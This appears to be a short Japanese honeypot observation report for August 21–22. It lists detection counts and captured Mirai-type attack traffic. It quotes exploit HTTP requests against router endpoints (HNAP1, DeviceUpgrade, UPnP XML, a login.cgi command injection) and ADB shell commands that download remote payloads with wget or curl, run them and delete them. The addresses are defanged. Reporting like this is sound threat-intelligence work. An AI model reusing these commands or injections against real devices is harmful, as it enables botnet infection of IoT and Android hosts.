今回は二日分まとめての更新となります。

8月21日
検知数 6,679 件
<0Byte以上の宛先ポート TOP10>

8月22日
検知数 6,734 件
<0Byte以上の宛先ポート TOP10>

 503ポートへのアクセスが増加しましたが、攻撃と思われるコードはないため、調査行為止まりの通信でした。

<マルウェアダウンロード>
①
POST /HNAP1/ HTTP/1[.]0
・wget hxxp://176[.]32[.]32[.]156/bin
・wget hxxp://50[.]115[.]166[.]136/bin
→Mirai系マルウェア
②
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
・wget -g 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi[.]sh
→Mirai系マルウェア
③
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd[.]mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://107[.]191[.]99[.]41/elf[.]mips
・wget hxxp://142[.]93[.]1[.]75/hoho[.]mips
・wget hxxp://209[.]97[.]143[.]112/bins/sora[.]mips
→Mirai系マルウェア

④
POST /wanipcn[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]112[.]150/mips
→Mirai系マルウェア

⑤
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1[.]1
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$ HTTP/1[.]1
→Mirai系マルウェアと推測

⑥
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]

・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp://185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
・shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs[.]
→リンク先ダウンロード不可

マルウェアの傾向も変わっておらず、基本的にはMirai系のマルウェアとなります。

以上、簡易分析となります。